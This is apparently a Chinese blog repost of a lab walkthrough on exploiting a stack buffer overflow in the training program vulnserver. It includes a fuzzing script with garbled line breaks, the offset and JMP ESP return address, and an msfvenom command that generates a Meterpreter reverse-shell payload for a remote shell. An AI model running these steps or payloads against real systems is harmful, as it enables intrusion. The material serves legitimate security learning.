启动时栈内存溢出_小白的一次缓冲区溢出复现笔记

最新推荐文章于 2024-01-10 10:56:54 发布
最新推荐文章于 2024-01-10 10:56:54 发布
阅读量314 收藏
点赞数 1
文章标签: 启动时栈内存溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42512441/article/details/112659948
版权

更多全球网络安全资讯尽在邑安全

缓冲区溢出

一:原理

缓冲区溢出的原因是程序中没有仔细检查用户输入的参数,通过往程序的缓冲区写超出其长度的内容,造成缓冲区的溢出,从而破坏程序的堆栈,造成程序崩溃或使程序转而执行其它指令,以达到攻击的目的。

二:汇编基础

通用寄存器:

AX(累加器)

BX(基址寄存器)

CX(计数器)

DX(数据寄存器)  ;可以分8位使用。

指针及变址寄存器:

SP(堆栈指针寄存器)

BP(基址指针寄存器)

SI(源变址寄存器)

DI(目的变址寄存器)

IP(指令指针寄存器):用来存放下一条要执行指令在内存中代码段中的偏移地址。

重点:缓冲区溢出堆栈覆盖顺序为 EIP -> ESP,通过控制EIP的指针跳转到ESP执行我们精心构造的shellcode

三,环境准备

漏洞软件:vulnserver 已知参数TRUN

调试软件:Immunity Debugger

辅助脚本:noma.py

kali

四,模糊测试

1,双击启动vulnserver,默认监听9999端口

b46c335f9266db4151eb0fd75c85c51c.png

2,通过脚本不断向目标程序发送数据,并查看寄存机的值

import socket

import syshost = "192.168.1.74"

port = 9999

buffer = ["A"]

counter=100

while len(buffer) <= 30:    

    buffer.append("A"*counter)    

    counter=counter+200for string in buffer:   

     print "fuzzing is %s bytes" % len(string)    

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)    

connect=s.connect((host,port))    

s.send('TRUN /.:/' + string)   

s.close()

3beec5aa514c1b1cc8236129779b1461.png

从上图可以看到,当发送到5900个字符时程序崩溃,说明存在缓冲区溢出

ef124bfe55ca0366b8d3ded5c7939b85.png

内存中都是以十六进制显示字符,由于字符“A”对应的十六进制为41,上图可以看到,我们发送的超长字符已经成功覆盖EIP和ESP,接下来需要精确找到是第多少个字符覆盖了EIP,我们需要控制他。

五,精确查找溢出点

由于我们之前生成的字符全部是A,不知道是第几个A覆盖了EIP,我们要生成不重复序列,精确定位EIP位置

1,msf-pattern_create -l  5900

c0034d8d1ea94e5f44a56154c256d8c0.png

复制这些字符替换我们前面脚本中的A

2,继续动态调试

成功溢出,记下EIP地址

cdcb20949cb03c0040bc59d9d185ba73.png

3,查找EIP偏移量

msf-pattern_offset -l 5900 -q 386f4337

bb7a5dcc51aa33e41fa8e73b14f272ad.png

显示结果为2003,说明覆盖EIP地址的是第2003个字符后面的字符,接下来就可以控制EIP的地址,需要让他跳转到我们的shellcode

六,控制EIP

1,获取JMP ESP汇编指令在内存中的十六进制数据,FFE4

fd4ac7aa859f3becd6c8e97f643746c1.png

2,寻找系统中的偏移地址,我们需要让EIP执行JMP ESP,从而跳转到ESP执行我们ESP中shellcode

3,查找vulnserver调用的系统文件,我们要找前四列都为false的模块,因为没有启用内存保护机制,每次为程序分配固定的内存地址,这样计算机重启不会导致溢出程序失效。

1d084f9d47e88c301d6b81e963c20609.png

4,在模块中查找 jmp esp对应的偏移地址

60d0e02367ec5860f22ee8f86f1bb463.png

跳转指令对应的偏移地址为625011af,我们来验证一下

d82176c675dde897a86e5055fb314714.png

修改py脚本,将2003后面的字节写成这个偏移地址,由于栈先进后出的原则,我们要反过来写,“\xaf\x11\x50\x62”,验证,需要设置断点。

d4df57e2c7f2d8639e3b896206faaae9.png

EIP成功指向跳转esp的偏移地址,接下来就可以在ESP构造shellcode,让EIP指向esp,shellcode就可以执行啦

七,生成shellcode

1,坏字节对shellcode的影响,有些字节在缓冲区中是无法使用的,我们需要找出来,将所有字节发送到缓冲区,查看哪些字节不正常。

脚本

4917db110023f2ab616ac84a09a4ee90.png

打开动态调试观察内存中数据分布

01ff1cfd7a460c7b428c2a6f38b75b9e.png

\x01\xff都正常,注意\x00是默认的坏字符,有可能终止shellcode执行,我们需要去除他

接下来生成shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.82 LPORT=4444 -a x86 --platform windows -f c -b "\x00"

-a 指定CPU架构

--platform 指定操作系统平台

46c1036310c32e8054b41fd1c0aa452d.png

将shellcode替换之前脚本中badchars

启动msf

2e546debc7630b99bd34220a50251cc9.png

运行py脚本

成功返回msf shell

70a91e77bdfd123cb2ede6c62adb3e81.png

到此为止,缓冲区溢出完成。

原文来自: 看雪学院

原文链接: https://bbs.pediy.com/thread-263721.htm

欢迎收藏并分享朋友圈,让五邑人网络更安全

06c8c7067dcf5a64419baa6f65d69ab3.png

欢迎扫描关注我们,及时了解最新安全动态、学习最潮流的安全姿势!

推荐文章

1

新永恒之蓝?微软SMBv3高危漏洞(CVE-2020-0796)分析复现

2

重大漏洞预警:ubuntu最新版本存在本地提权漏洞(已有EXP) 

善缘斋
关注
[漏洞挖掘与防护] 03.漏洞利用之WinRAR安全缺陷复现(CVE-2018-20250)及软件自启动分析
杨秀璋的专栏
08-26 216
上一篇文章将详细介绍MS08-067远程代码执行漏洞(CVE-2008-4250)及防御过程,它是Windows Server服务RPC请求缓冲区溢出漏洞,利用445端口,并通过Metasploit工具获取shell及进行深入的操作。这篇文章将详细讲解WinRAR漏洞(CVE-2018-20250),并复现了该漏洞和讲解了恶意软件自启动劫持原理。基础性文章,希望对入门的同学有帮助。
cookie 检测代码检测到基于堆缓冲区溢出_微软正在为Win10开发强制堆保护功能加强系统和设备的安全性...
weixin_39620629的博客
12-04 1667
微软日前宣布Windows 10系统正在开发的新功能,该功能名为强制堆保护旨在加强系统和设备的整体安全性。顾名思义该功能主要通过保护堆来确保数据不会遭到劫持,不过该功能实际还需要依靠现代处理器的相关技术。微软表示强制堆保护通过使用现代处理器和影子堆间的结合,对内存中的堆数据等进行严格管理防止泄露。影子堆:指的是读取原堆中的数据然后与加载顺序进行对比,若检测到返回地址不同则判...
sudo缓冲区溢出漏洞复现(CVE-2021-3156)
Zlirving_的博客
02-03 1086
目录漏洞概述影响版本漏洞复现判断环境是否存在漏洞exp地址手工漏洞检测修复建议 漏洞概述 1月26日,sudo发布安全通告,修复了一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或 -i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。只要存在sudoers文件(通常是 /etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统r
Windows系统弹出:“系统在此应用程序检测到基于堆缓冲区溢出,如何解决?“解决办法
热门推荐
daijingxin的博客
01-10 1万+
按 “Windows 徽标键+R”,输入 “msconfig”,回车启动系统配置页面。点击 “服务”>“隐藏所有 Microsoft 服务”,点击 “全部禁用”。鼠标右击任务栏,启动任务管理器。点击 “启动” 选项卡,将所有的启动项全部禁用。通过开始菜单重启设备 (请选择重启设备,不要选择关机后再开机)。执行完毕后重启设备,查看问题是否解决。
缓冲区溢出错误解决办法
weixin_34279246的博客
04-08 4026
在做网络管理的过程中经常会遇到此类错误,这多是软件在开发调试时留下的bug,***也经常利用这个漏洞进行***,现总结出一些解决办法。 0x7c92100b指令引用的0x00000034内存。该内存不能为read 解决办法: 1、硬件上的原因,主要是内存条不兼容,更换内存。 2、系统或其它软件引起的,可用下述方法处理: (1) 系统本身有问题,及时安装官方发行...
缓冲区溢出溢出)
weixin_30670151的博客
09-08 303
前言 在现在的网络攻击中,缓冲区溢出方式的攻击占据了很大一部分,缓冲区溢出是一种非常普遍的漏洞,但同时,它也是非常危险的一种漏洞,轻则导致系统宕机,重则可导致攻击者获取系统权限,进而盗取数据,为所欲为。 其实缓冲区攻击说来也简单,请看下面一段代码: void main(int argc, char *argv[]) { char buffer[8]; if(argc &g...
Windows系统安全之SLMail缓冲区溢出漏洞复现
Hvnt3r的博客
03-06 2307
原文链接 在我大二时任技术交流协会信安部部长时我曾给学弟学妹们介绍过这个关于SLMail的缓冲区溢出漏洞,给他们讲的原因是想扩展一下他们的知识面,现在我再重新温习一下这个漏洞来跟现阶段学习的Linux缓冲区漏洞做一个对比 环境搭建 首先需要搭建实验环境,系统可选用Windows_XP,因为Windows7及以上的系统内置了多种安全措施使得此漏洞难以利用,本实验用到的软件及下载链接如下: SLMa...
溢出原理及解题练习
weixin_44222568的博客
04-15 1913
一个小白的慢慢理会过程
Linux溢出获取shell之Return to libc
d3f4ult的博客
04-10 771
文章目录简介参考资料知识铺垫 简介 本次实验将通过hackthebox的Enterprise的靶机来学习利用Return-to-libc实现Linux溢出并获取shell。在实验的过程中,遇到了很多的理论问题,百度后发现国内关于Return to libc的理论比较少,基本都是这种操作:system+exit+sh,却没有讲为什么,尤其是system后面为什么一定要跟exit。 参考资料 《0...
CVE-2021-3156 漏洞复现笔记
weixin_46483787的博客
07-01 1万+
CVE-2021-3156复现笔记
svchost.exe文件占用内存不断的增加,最后造成内存资源耗竭,最后死机处理办法
10-30
svchost.exe是一个属于微软Windows操作系统的系统程序,用于执行DLL文件。这个程序对你系统的正常运行是非常重要的。注意:svchost.exe也有可能是W32.Welchia.Worm病毒,它利用Windows LSASS漏洞,制造缓冲区溢出,导致你计算机关机。 如果怀疑svchost.exe是病毒可以通过以下方法来证实是不是病毒:1.可以去 wins 目录找找有无多余,2.可以搜搜windows文件夹中 svchost.exe 看看有几个(应为1个), ist -s察看,4.也可以下载一个可以看带路径名的进程的浏览工具。
VulnServer
01-16
Vulnserver是一款Windows服务器应用程序,其中包含一系列可供利用的缓冲区溢出漏洞,旨在为大家在学习和实践基本的fuzzing、调试以及开发技能方面提供必要的辅助。关于Vulnserver的更多信息,例如下载链接等
vulnhub-Tr0ll: 2 (考点:脑洞/猜猜猜/linux缓冲区溢出
冬萍子癸水
04-23 447
https://www.vulnhub.com/entry/tr0ll-2,107/ nat模式, arp-scan -l 比平常多出来的ip就是靶机 这靶机跟上一个同名作品1一样继续考脑洞,猜猜猜,后面的缓冲区溢出,更是3个door不停的变换加断掉ssh加禁止ls等,够无聊的。。。。 这个缓冲区溢出,也挺诡异,我搜了这台靶机中国人写的外国人写的很多文章。esp地址和shellcode有的人这个可...
svchost.exe占用内存过高
业精于勤荒于嬉;行成于思,毁于随。
09-21 697
禁用 Background Intelligent Transfer Service~ 服务列表即可
gmon_Vulnserver GMON攻击
weixin_26722031的博客
08-02 508
gmonIn this post, we will be exploiting the GMON command of Vulnerver using SEH based buffer overflow. If you are not acquainted with SEH based buffer overflows you can refer to the Exploit Research M...
windows 32位缓冲区溢出漏洞
守拙的博客
11-08 510
windows32位系统缓冲区溢出漏洞实践,syncbreeze软件缓冲区溢出漏洞
缓冲区溢出
weixin_30707875的博客
10-29 885
我们在做项目的过程中遇到过一个问题:打开底层板卡,对板卡进行读写的时候,板卡的句柄莫名奇妙改变了,而我们没有显式改变过它。 其实这是一类问题,就是局部变量莫名其妙被修改。这是由于堆缓冲区溢出造成的,主要现象是:1.某些局部变量莫名其妙被改 2.函数返回的时候崩溃 主要原因是:1. 数组越界 2.某些缓冲区拷贝函数如 sprintf ,strcpy,memcpy缓冲区溢出,...
缓冲区溢出进不了系统_计算机系统漫游
weixin_39947522的博客
12-01 1307
计算机系统漫游引子本文标题取自计算机书籍《Computer Systems A Programmer's perspective》的序章,国内通常的书名翻译是《深入理解计算机系统》。该文是个人对本书及对应的CMU课程15213 Introduction to Computer Systems 的观点记录。后续我将用三个月左右的时间将对于本书的理解记录成文章表达出来。二进制的世界系统中的所...
report ETL .ffff
最新发布
09-17
report ETL .ffff
解决Eclipse Tomcat启动时内存溢出问题
"在使用Eclipse启动Tomcat时遇到内存溢出的问题,这通常是由于Java虚拟机(JVM)分配的内存不足导致的。解决这个问题通常涉及到调整JVM的内存设置,包括初始堆大小(-Xms)、最大堆大小(-Xmx)以及永久代大小(-XX:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值